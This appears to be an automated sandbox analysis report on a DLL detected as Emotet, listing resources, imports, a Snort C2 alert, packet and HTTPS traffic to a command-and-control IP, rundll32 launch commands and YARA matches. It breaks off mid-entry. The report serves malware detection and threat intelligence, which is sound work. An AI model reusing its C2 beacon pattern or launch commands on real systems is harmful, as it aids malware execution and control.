                                                                                                      RT_CURSOR0x9fce40x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9fe180x134dataEnglishUnited States
                                                                                                      RT_CURSOR0x9ff4c0x134dataEnglishUnited States
                                                                                                      RT_CURSOR0xa00800x134dataEnglishUnited States
                                                                                                      RT_CURSOR0xa01b40xb4dataEnglishUnited States
                                                                                                      RT_BITMAP0xa02680x4a0dataEnglishUnited States
                                                                                                      RT_BITMAP0xa07080x2c0dataEnglishUnited States
                                                                                                      RT_BITMAP0xa09c80xb8dataEnglishUnited States
                                                                                                      RT_BITMAP0xa0a800x144dataEnglishUnited States
                                                                                                      RT_ICON0xa0bc40x2e8dataEnglishUnited States
                                                                                                      RT_ICON0xa0eac0x2e8dataEnglishUnited States
                                                                                                      RT_MENU0xa11940x15cdataEnglishUnited States
                                                                                                      RT_MENU0xa12f00x42edataEnglishUnited States
                                                                                                      RT_MENU0xa17200x25cdataEnglishUnited States
                                                                                                      RT_MENU0xa197c0x478dataEnglishUnited States
                                                                                                      RT_DIALOG0xa1df40x1dadataEnglishUnited States
                                                                                                      RT_DIALOG0xa1fd00x3eadataEnglishUnited States
                                                                                                      RT_DIALOG0xa23bc0x250dataEnglishUnited States
                                                                                                      RT_DIALOG0xa260c0xd2dataEnglishUnited States
                                                                                                      RT_DIALOG0xa26e00xe8dataEnglishUnited States
                                                                                                      RT_DIALOG0xa27c80x1a2dataEnglishUnited States
                                                                                                      RT_DIALOG0xa296c0x15adataEnglishUnited States
                                                                                                      RT_DIALOG0xa2ac80x34dataEnglishUnited States
                                                                                                      RT_STRING0xa2afc0x102dataEnglishUnited States
                                                                                                      RT_STRING0xa2c000x124dataEnglishUnited States
                                                                                                      RT_STRING0xa2d240xd8dataEnglishUnited States
                                                                                                      RT_STRING0xa2dfc0x7cdataEnglishUnited States
                                                                                                      RT_STRING0xa2e780xaadataEnglishUnited States
                                                                                                      RT_STRING0xa2f240x8cdataEnglishUnited States
                                                                                                      RT_STRING0xa2fb00xa2dataEnglishUnited States
                                                                                                      RT_STRING0xa30540x1d2dataEnglishUnited States
                                                                                                      RT_STRING0xa32280xb0dataEnglishUnited States
                                                                                                      RT_STRING0xa32d80x23edataEnglishUnited States
                                                                                                      RT_STRING0xa35180x100dataEnglishUnited States
                                                                                                      RT_STRING0xa36180x220dataEnglishUnited States
                                                                                                      RT_STRING0xa38380x46dataEnglishUnited States
                                                                                                      RT_STRING0xa38800x86dataEnglishUnited States
                                                                                                      RT_STRING0xa39080x1acdataEnglishUnited States
                                                                                                      RT_STRING0xa3ab40xaedataEnglishUnited States
                                                                                                      RT_STRING0xa3b640xcadataEnglishUnited States
                                                                                                      RT_STRING0xa3c300x2adataEnglishUnited States
                                                                                                      RT_STRING0xa3c5c0x192dataEnglishUnited States
                                                                                                      RT_STRING0xa3df00x124dataEnglishUnited States
                                                                                                      RT_STRING0xa3f140x5edataEnglishUnited States
                                                                                                      RT_STRING0xa3f740x4adataEnglishUnited States
                                                                                                      RT_STRING0xa3fc00x4e2dataEnglishUnited States
                                                                                                      RT_STRING0xa44a40x31adataEnglishUnited States
                                                                                                      RT_STRING0xa47c00x2dcdataEnglishUnited States
                                                                                                      RT_STRING0xa4a9c0x8adataEnglishUnited States
                                                                                                      RT_STRING0xa4b280x32edataEnglishUnited States
                                                                                                      RT_STRING0xa4e580xdedataEnglishUnited States
                                                                                                      RT_STRING0xa4f380x4c4dataEnglishUnited States
                                                                                                      RT_STRING0xa53fc0x264dataEnglishUnited States
                                                                                                      RT_STRING0xa56600x2cdataEnglishUnited States
                                                                                                      RT_STRING0xa568c0x42dataEnglishUnited States
                                                                                                      RT_ACCELERATOR0xa56d00x78dataEnglishUnited States
                                                                                                      RT_ACCELERATOR0xa57480x50dataEnglishUnited States
                                                                                                      RT_ACCELERATOR0xa57980x18dataEnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa57b00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa57d40x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa57f80x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa581c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58400x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58640x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58880x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58ac0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58d00x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa58f40x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59180x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa593c0x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa599c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59b00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59c40x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59d80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa59ec0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a000x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a140x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a3c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a500x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_CURSOR0xa5a640x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States
                                                                                                      RT_GROUP_ICON0xa5a780x14dataEnglishUnited States
                                                                                                      RT_GROUP_ICON0xa5a8c0x14dataEnglishUnited States
                                                                                                      RT_MANIFEST0xa5aa00x56ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                      Imports

                                                                                                      DLLImport
                                                                                                      KERNEL32.dllRaiseException, HeapSize, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapDestroy, HeapCreate, VirtualFree, Sleep, GetStdHandle, GetACP, GetTimeZoneInformation, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, RtlUnwind, GetStringTypeW, SetHandleCount, GetFileType, GetStartupInfoA, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, LCMapStringA, LCMapStringW, GetConsoleCP, GetConsoleMode, GetLocaleInfoW, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetEnvironmentVariableA, GetProcessHeap, GetCommandLineA, GetDateFormatA, GetTimeFormatA, GetSystemTimeAsFileTime, HeapReAlloc, VirtualQuery, GetSystemInfo, VirtualAlloc, VirtualProtect, HeapAlloc, HeapFree, GetCurrentDirectoryA, GetShortPathNameA, GetVolumeInformationA, GetCurrentProcess, DuplicateHandle, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, DeleteFileA, MoveFileA, GetProfileIntA, GetOEMCP, GetCPInfo, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, GlobalHandle, GlobalReAlloc, TlsGetValue, GetThreadLocale, GlobalFlags, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSection, GetCurrentThread, ConvertDefaultLocale, EnumResourceLanguagesA, GetLocaleInfoA, GetFileSize, CreateFileA, CloseHandle, SystemTimeToFileTime, LocalFileTimeToFileTime, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToSystemTime, GetModuleFileNameA, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, GetFileAttributesA, LocalAlloc, LocalLock, LocalUnlock, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, lstrcmpA, InterlockedIncrement, GetCurrentProcessId, GetCurrentThreadId, GlobalGetAtomNameA, GlobalAddAtomA, GlobalFindAtomA, GlobalDeleteAtom, lstrcmpW, GetVersionExA, CopyFileA, GlobalSize, GlobalAlloc, FormatMessageA, LocalFree, FreeLibrary, InterlockedDecrement, GlobalFree, FreeResource, GlobalLock, GlobalUnlock, GetModuleHandleA, GetProcAddress, SetLastError, GetTickCount, MulDiv, lstrcpynA, LoadLibraryA, ExitProcess, GetVersion, CompareStringA, LockResource, lstrcmpiA, GetLastError, InterlockedExchange, GetStringTypeExA, lstrlenW, MultiByteToWideChar, CompareStringW, SizeofResource, WideCharToMultiByte, LoadResource, lstrlenA, FindResourceA, GlobalMemoryStatus, GetStringTypeA
                                                                                                      USER32.dllSetCapture, GetDCEx, FindWindowA, SetWindowRgn, DestroyIcon, LockWindowUpdate, ShowOwnedPopups, PostQuitMessage, LoadCursorA, DestroyCursor, GetTabbedTextExtentA, MessageBeep, IsClipboardFormatAvailable, RedrawWindow, TranslateMDISysAccel, DrawMenuBar, DefMDIChildProcA, DefFrameProcA, SetParent, WindowFromDC, InSendMessage, ClipCursor, GetCursorPos, PostThreadMessageA, CreateMenu, CopyAcceleratorTableA, UnpackDDElParam, ReuseDDElParam, LoadMenuA, DestroyMenu, GetWindowThreadProcessId, SetCursor, ReleaseCapture, InsertMenuItemA, CreatePopupMenu, SetMenu, TranslateAcceleratorA, InvalidateRect, SetRectEmpty, ShowWindow, IsDialogMessageA, SetDlgItemTextA, RegisterWindowMessageA, SendDlgItemMessageA, WinHelpA, IsChild, GetCapture, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, GetLastActivePopup, DispatchMessageA, DeleteMenu, EndDeferWindowPos, GetTopWindow, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, ScrollWindow, TrackPopupMenu, GetKeyState, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, GetMenu, PostMessageA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, DeferWindowPos, CopyRect, GetScrollInfo, SetScrollInfo, PtInRect, SetWindowPlacement, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindow, GetMenuStringA, AppendMenuA, GetMenuItemID, InsertMenuA, GetMenuItemCount, GetSubMenu, RemoveMenu, UnhookWindowsHookEx, GetDesktopWindow, GetActiveWindow, SetActiveWindow, CreateDialogIndirectParamA, IsWindow, GetWindowLongA, EnableWindow, GetSystemMetrics, SetRect, LoadAcceleratorsA, GetDlgItem, IsWindowEnabled, GetNextDlgTabItem, EndDialog, GetSysColor, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, ScreenToClient, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, SetMenuItemBitmaps, WindowFromPoint, GetMenuItemInfoA, UnregisterClassA, GetSysColorBrush, RegisterClipboardFormatA, GetMessageA, TranslateMessage, BeginDeferWindowPos, ValidateRect, GetClientRect, DrawIcon, wsprintfA, CharUpperA, LoadIconA, FillRect, MessageBoxA, IsZoomed, SendMessageA, IsWindowVisible, IsRectEmpty, InflateRect, UpdateWindow, SetWindowTextA, SetWindowPos, ReleaseDC, CreateWindowExA, BringWindowToTop, SetWindowLongA, GetDC, GetParent, GetFocus, KillTimer, GetWindowRect, SetTimer, DestroyWindow, IsIconic, CheckMenuItem, EnableMenuItem, GetMenuState, ModifyMenuA, LoadBitmapA, GetMenuCheckMarkDimensions
                                                                                                      GDI32.dllSetWindowExtEx, ScaleWindowExtEx, GetCurrentPositionEx, DeleteDC, CreatePatternBrush, CreatePen, CreateSolidBrush, CopyMetaFileA, CreateDCA, GetCharWidthA, CreateFontA, StretchDIBits, SetBrushOrgEx, CreateMetaFileA, SetWindowOrgEx, DeleteMetaFile, GetTextExtentPoint32A, DPtoLP, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, PatBlt, GetViewportOrgEx, GetBkColor, UnrealizeObject, GetTextAlign, GetWindowOrgEx, StartPage, EndPage, SetAbortProc, AbortDoc, EndDoc, CreateEllipticRgn, LPtoDP, Ellipse, GetNearestColor, GetBkMode, GetPolyFillMode, GetROP2, GetStretchBltMode, GetTextColor, GetTextFaceA, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, StartDocA, GetPixel, BitBlt, CloseMetaFile, GetStockObject, GetViewportExtEx, CreateRectRgn, SelectClipRgn, DeleteObject, SetTextAlign, MoveToEx, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetStretchBltMode, SetROP2, SetPolyFillMode, SetBkMode, SetBkColor, RestoreDC, SaveDC, CreateBitmap, GetDeviceCaps, CreateFontIndirectA, GetObjectA, GetTextMetricsA, StretchBlt, CreateCompatibleDC, CreateCompatibleBitmap, Rectangle, GetWindowExtEx
                                                                                                      comdlg32.dllGetFileTitleA
                                                                                                      WINSPOOL.DRVGetJobA, DocumentPropertiesA, OpenPrinterA, ClosePrinter
                                                                                                      ADVAPI32.dllRegQueryValueA, RegEnumKeyA, GetFileSecurityA, SetFileSecurityA, RegDeleteKeyA, RegDeleteValueA, RegSetValueExA, RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegSetValueA, RegCloseKey, RegCreateKeyA
                                                                                                      SHELL32.dllDragFinish, DragQueryFileA, ExtractIconA, SHGetFileInfoA, DragAcceptFiles
                                                                                                      SHLWAPI.dllPathRemoveExtensionA, PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                                                                      oledlg.dll
                                                                                                      ole32.dllOleIsCurrentClipboard, OleFlushClipboard, CoRegisterClassObject, CoRevokeClassObject, OleUninitialize, CoFreeUnusedLibraries, OleInitialize, OleLockRunning, CoRegisterMessageFilter, OleSetClipboard, CreateFileMoniker, StgCreateDocfile, CoDisconnectObject, CreateGenericComposite, CreateItemMoniker, CreateStreamOnHGlobal, OleSaveToStream, WriteClassStm, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, CreateDataAdviseHolder, OleRegGetMiscStatus, CreateOleAdviseHolder, OleRegEnumVerbs, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, IsAccelerator, OleTranslateAccelerator, OleDuplicateData, CoTaskMemAlloc, ReleaseStgMedium, CreateBindCtx, StringFromCLSID, OleRegGetUserType, WriteClassStg, CoTaskMemFree, CoLockObjectExternal, OleRun, GetRunningObjectTable, OleIsRunning, StgIsStorageFile, StgOpenStorage
                                                                                                      OLEAUT32.dllSysStringLen, SysStringByteLen, VariantClear, VariantChangeType, VariantInit, SysAllocStringLen, SysFreeString

                                                                                                      Exports

                                                                                                      NameOrdinalAddress
                                                                                                      Control_RunDLL10x10003680

                                                                                                      Possible Origin

                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                      EnglishUnited States

                                                                                                      Network Behavior

                                                                                                      Snort IDS Alerts

                                                                                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                      12/01/21-16:12:03.931139TCP2404336ET CNC Feodo Tracker Reported CnC Server TCP group 1949775443192.168.2.451.178.61.60

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets

                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 1, 2021 16:12:03.931138992 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:03.931215048 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:03.931405067 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.000613928 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.000655890 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:04.110825062 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:04.110970974 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.498553991 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.498589993 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:04.499031067 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:04.500966072 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.530108929 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:04.572871923 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:05.137804985 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:05.137996912 CET4434977551.178.61.60192.168.2.4
                                                                                                      Dec 1, 2021 16:12:05.138084888 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:05.138143063 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:05.140539885 CET49775443192.168.2.451.178.61.60
                                                                                                      Dec 1, 2021 16:12:05.140568018 CET4434977551.178.61.60192.168.2.4

                                                                                                      HTTP Request Dependency Graph

                                                                                                      • 51.178.61.60

                                                                                                      HTTPS Proxied Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.44977551.178.61.60443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-12-01 15:12:04 UTC0OUTGET /ZKzoaCRaSGPOqJVHjhZJzdCfaeZvESlfQfwHxNYMOhGmjZbKSRXfZNvJ HTTP/1.1
                                                                                                      Cookie: BbabBTNqIR=qrh4znIW0vRoZUgVJJVgzfQvY9C+RpRussFCR/fGFdtMBlPVybXrZsLF92dUNSOaN7UtApPRkIXlq1+7rNMFKl/GD+kwN0+UKJ1vSTU/v1LmGzXvNL9Y6Ncf4sehP3YL6oaRsTpSuU6YzoarwBbK29kvoAsGOYRv6Xj3viHnIeOCY6VwhklOKsvWD+GGQWp/+KzcLqZXdf6vX1pw51ydx7BZAIYsZ4oO5HPx+C0OX/W7prasTQF+SxpB+l8kw9kHpKuLSE3MN5eruU/U1ZyDN8wwOUnkB9ePec54mFaBjmfD1QEzkF2yYIRzHwr7O5Mz0xHblcofjcNex7IClSGUVtOK3eIw
                                                                                                      Host: 51.178.61.60
                                                                                                      Connection: Keep-Alive
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-12-01 15:12:05 UTC0INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Wed, 01 Dec 2021 15:12:05 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      2021-12-01 15:12:05 UTC0INData Raw: 33 30 31 0d 0a 20 9b c5 28 57 37 9f 3b 96 c5 45 95 6a a2 15 b8 f4 41 76 33 3b ae 0c 15 49 0c 36 5e b0 1c a1 f1 ce c4 2c 55 d6 d6 fc 1c 98 3c 7e 88 82 5f 6c 2f 4e e2 0f 21 bc e0 f2 81 2a fb 54 ba cc bf 3f fc 78 46 1b 08 69 e2 c9 45 ab 80 93 45 3a b1 42 b0 fc e3 4e d5 c5 bf ab aa a3 1a d4 4c 37 2b d5 91 d5 66 47 03 03 c8 e7 99 d1 79 ba 02 78 00 80 d4 41 66 62 7c e6 70 bd 5a 59 53 09 03 8c 61 da bc e5 49 9b 2e 3c e7 d1 da 37 14 bd 10 da 06 40 80 f1 bb 3a c8 df bd de 88 04 fe 52 5b 0f 7b b3 06 81 84 b9 3d fe 81 b3 67 8a 1a 85 d6 95 9c 9d 82 a0 e1 92 a6 3d f4 20 6e 13 cc 5e ef d7 83 b6 fd 9a 50 74 28 1e 96 17 e7 ac 6f 22 2f c0 1c f0 93 f3 a9 16 9f ec 0c 20 7a 49 68 f1 19 c7 59 c3 a4 f5 cf 06 c8 55 0c 84 b7 3a ce 7b f4 a7 73 e2 8b ce df b1 6f a7 82 10 0a 01 64
                                                                                                      Data Ascii: 301 (W7;EjAv3;I6^,U<~_l/N!*T?xFiEE:BNL7+fGyxAfb|pZYSaI.<7@:R[{=g= n^Pt(o"/ zIhYU:{sod


                                                                                                      Code Manipulations

                                                                                                      Statistics

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      Analysis Process: loaddll32.exe PID: 6816 Parent PID: 5704

                                                                                                      General

                                                                                                      Start time:16:11:53
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\loaddll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:loaddll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll"
                                                                                                      Imagebase:0xd30000
                                                                                                      File size:893440 bytes
                                                                                                      MD5 hash:72FCD8FB0ADC38ED9050569AD673650E
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: cmd.exe PID: 6796 Parent PID: 6816

                                                                                                      General

                                                                                                      Start time:16:11:53
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                                                                                                      Imagebase:0x11d0000
                                                                                                      File size:232960 bytes
                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: svchost.exe PID: 6836 Parent PID: 568

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                      Imagebase:0x7ff6eb840000
                                                                                                      File size:51288 bytes
                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: rundll32.exe PID: 6792 Parent PID: 6816

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll,Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712245563.00000000046E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712289758.0000000004711000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712514212.00000000048B1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712664698.0000000004911000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712162779.0000000004631000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712727948.0000000004A40000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711795712.0000000004040000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711701070.0000000003FC1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712440145.0000000004880000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712583531.00000000048E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.712769808.0000000004A71000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.711647577.0000000003F80000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Analysis Process: rundll32.exe PID: 6860 Parent PID: 6796

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",#1
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.710421091.00000000030D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.710385050.00000000030A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Analysis Process: rundll32.exe PID: 6880 Parent PID: 6860

                                                                                                      General

                                                                                                      Start time:16:11:54
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\spZRMihlrkFGqYq1f.dll",Control_RunDLL
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high

                                                                                                      Analysis Process: rundll32.exe PID: 4928 Parent PID: 6792

                                                                                                      General

                                                                                                      Start time:16:11:55
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Feetevsox\qeijjyafbaho.gis",ayowadvg
                                                                                                      Imagebase:0x10000
                                                                                                      File size:61952 bytes
                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.715083656.00000000042D1000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.714978387.00000000041A0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:high

                                                                                                      Analysis Process: rundll32.exe PID: 3476 Parent PID: 4928

                                                                                                      General

                                                                                                      Start time:16:11:56
                                                                                                      Start date:01/12/2021
                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Feetevsox\qeijjyafbaho.gis",Control_RunDLL
                                                                                                      Imagebase:0x10000
